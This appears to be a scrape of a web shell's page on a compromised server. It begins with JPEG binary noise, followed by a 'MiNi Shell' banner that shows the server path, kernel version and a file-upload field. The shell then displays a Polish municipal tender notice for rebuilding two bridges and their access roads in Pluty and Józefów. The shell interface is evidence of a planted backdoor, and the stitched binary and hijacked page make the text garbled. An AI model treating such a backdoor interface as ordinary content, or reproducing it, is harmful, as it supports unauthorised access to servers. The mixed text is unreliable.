JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220222/0006469402-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa infrastruktury drogowej w tym bezpieczeństwa komunikacji transportowej poprzez przebudowę obiektów mostowych w ciągu dróg gminnych w Plutach i Józefowie oraz<br/>dróg dojazdowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Tuszów Narodowy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581933</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tuszów Narodowy 225</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuszów Narodowy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-332</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48177743720</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">177743721</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@tuszownarodowy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.tuszownarodowy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa infrastruktury drogowej w tym bezpieczeństwa komunikacji transportowej poprzez przebudowę obiektów mostowych w ciągu dróg gminnych w Plutach i Józefowie oraz<br/>dróg dojazdowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ec1c1a5-92f2-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00064694</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00042209/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Poprawa infrastruktury drogowej w tym bezpieczeństwa komunikacji transportowej poprzez przebudowę obiektów mostowych w ciągu dróg gminnych w Plutach i Józefowie oraz dróg dojazdowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://tuszownarodowy.biuletyn.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej gmina@tuszownarodowy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Pan Grzegorz Niedbała, tel.<br/>+48 (17) 774 37 20 email: gmina@tuszownarodowy.pl<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP). Zasady składania ofert oraz<br/>dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania<br/>opisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i<br/>postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w<br/>szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w<br/>Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest dysponowanie<br/>przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko<br/>na platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania z urządzeń<br/>mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu miniPortal może być<br/>ograniczony. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania<br/>czasu odbioru danych:<br/> specyfikacja połączenia formularze udostępnione są za pomocą protokołu<br/>TLS 1.2,<br/> format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8,<br/> oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane<br/>zapisywane są z dokładnością co do setnej części sekundy,<br/> integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP.<br/>W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego<br/>automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie<br/>Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane<br/>poświadczenia” jest zawarta informacja o dacie doręczenia.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/> Microsoft Internet Explorer od wersji 9.0,<br/> Mozilla Firefox od wersji 15,<br/> Google Chrome od wersji 20.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku”<br/>i „Formularza do komunikacji” wynosi 150 MB.<br/>5. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>6. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do<br/>zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach<br/>danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki<br/>ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.<br/>7. Ofertę należy sporządzić w języku polskim.<br/>8. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Ze względu na ograniczoną ilość znaków, pozostałe wymagania techniczne i organizacyjne znajdują<br/>się w Rozdziale 11 SWZ postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z 04.05.2016, str. 1), dalej „RODO” Zamawiający<br/>informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca<br/>przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego<br/>na zadanie pn.: &#34;Poprawa infrastruktury drogowej w tym bezpieczeństwa komunikacji transportowej poprzez przebudowę obiektów mostowych w ciągu dróg gminnych w Plutach i Józefowie oraz dróg dojazdowych&#34; prowadzonym w trybie podstawowym;<br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej „ustawa Pzp”;<br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego<br/>nienaruszalność.<br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>7) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje<br/>zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza<br/>integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna,<br/>że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>8) Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKP.271.02.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem inwestycji jest przebudowa obiektu mostowego na potoku Babulówka wraz zabezpieczeniem skarp i dna potoku w tym: przebudowa drogi gminnej nr 103606R w Plutach. Celem przebudowy mostu jest potrzeba zapewnienia należytej komunikacji przez potok „Babulówka dla mieszkańców, których posesje usytuowane są po przeciwległej stronie cieków oraz w celu powiększenia zbyt małego światła istniejącego obiektu utrudniającego swobodny spływ wód w sytuacjach powodziowych. Przewidziano rozebranie istniejącego przepustu o długości 11,90m i rozpiętości w świetle 6,90m. Inwestor zaprojektował most stały żelbetowy, posadowiony na przyczółkach betonowych ze skrzydłami. Dojazdy do mostu posiada nawierzchnię asfaltową. Stan istniejącego mostu drewnianego jest bardzo zły. Stwierdzono duże ubytki konstrukcji mostu oraz widoczne podmycia i pęknięcia przyczółków oraz skrzydeł betonowych. Przepust posiada uszkodzone poręcza, stanowią duże zagrożenie dla bezpieczeństwa użytkowników tego obiektu. Istniejący przepust (obiekt mostowy) przecina potok pod kątem około 90 stopni. Potok w miejscu przecięcia mostem biegnie po łuku. W ramach przedsięwzięcia przewiduje się odbudowę (przebudowę) mostu drogowego wraz z dojazdami, umocnienie skarp i dna potoku bezpośrednio na wlocie i wylocie mostu. Roboty w pasie drogowym obejmują przebudowę drogi gminnej o długości łącznej 147 mb, związane są przebudową dojazdów do przepustu obejmować będą m.in.: przebudowę korpusu drogi wraz nawierzchnią i z poszerzeniem poboczy. Projektowany przepust jest sytuowany w osi mostu istniejącego przeznaczony do rozbiórki. Kąt skrzyżowania osi nowego mostu z osią drogi wynosi około 90 stopni. Po przebudowie obiektu mostowego, wykonaniu chodników na obiekcie mostowym oraz dróg dojazdowych i zjazdowych zdecydowanie poprawi się bezpieczeństwo, komfort uczestników ruchu drogowego oraz ład i komunikacja przestrzenna w gminie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45221111-3 - Roboty budowlane w zakresie mostów drogowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45221100-3 - Roboty budowlane w zakresie budowy mostów</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów wskazanych w Rozdziale 17 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości na wykonane roboty budowlane oraz dostarczone i wbudowane materiał</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa obiektu mostowego na „Potoku Rów&#34; wraz zabezpieczeniem skarp i dna potoku, obiekt mostowy zlokalizowany jest w ciągu drogi gminnej nr: <br/>10 3613R w miejscowości Józefów na drodze gminnej Grochowe I – Goźlin-Sowy Pluty.<br/>Celem przebudowy obiektu mostowego jest z potrzeba zapewnienia należytej komunikacji przez rzekę &#34;Potok&#34; dla mieszkańców, których posesje usytuowane są po przeciwległej stronie cieku oraz w celu powiększenia zbyt małego światła istniejącego obiektu utrudniającego swobodny spływ wód w sytuacjach powodziowych, przewidziano rozebranie istniejącego przepustu o długości 11,90m i rozpiętości w świetle 6,90m. Inwestor zaprojektował most stały żelbetowy, posadowiony na przyczółkach betonowych ze skrzydłami. Dojazd do mostu posiada nawierzchnię asfaltową. Stan istniejącego mostu drewnianego jest bardzo zły. Stwierdzono duże ubytki konstrukcji mostu oraz widoczne podmycia i pęknięcia przyczółków oraz skrzydeł betonowych. Przepust posiada uszkodzone poręcza, które stanowią duże zagrożenie dla bezpieczeństwa użytkowników tego obiektu. Istniejący przepust (obiekt mostowy) przecina potok pod kątem około 90 stopni. Potok w miejscu przecięcia mostem biegnie po łuku. W ramach przedsięwzięcia przewiduje się odbudowę (przebudowę) mostu drogowego wraz z dojazdami, umocnienie skarp i dna potoku bezpośrednio na wlocie i wylocie mostu. Roboty w pasie drogowym obejmują przebudowę drogi gminnej o długości łącznej 30 mb, związane są przebudową dojazdów do przepustów obejmować będą m.in.: przebudowę korpusu drogi wraz nawierzchnią i z poszerzeniem poboczy. Projektowany przepust jest sytuowany w osi mostu istniejącego przeznaczonego do rozbiórki. Kąt skrzyżowania osi nowego mostu z osią drogi wynosi około 90 stopni. Po przebudowie ww. obiektu mostowego, wykonaniu chodników na obiekcie oraz drogi dojazdowej i zjazdowej zdecydowanie poprawi się bezpieczeństwo, komfort uczestników ruchu drogowego oraz ład i komunikacja przestrzenna w gminie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45221111-3 - Roboty budowlane w zakresie mostów drogowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45221100-3 - Roboty budowlane w zakresie budowy mostów</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów wskazanych w Rozdziale 17 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji jakości na wykonane roboty budowlane oraz dostarczone i wbudowane materiał</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to 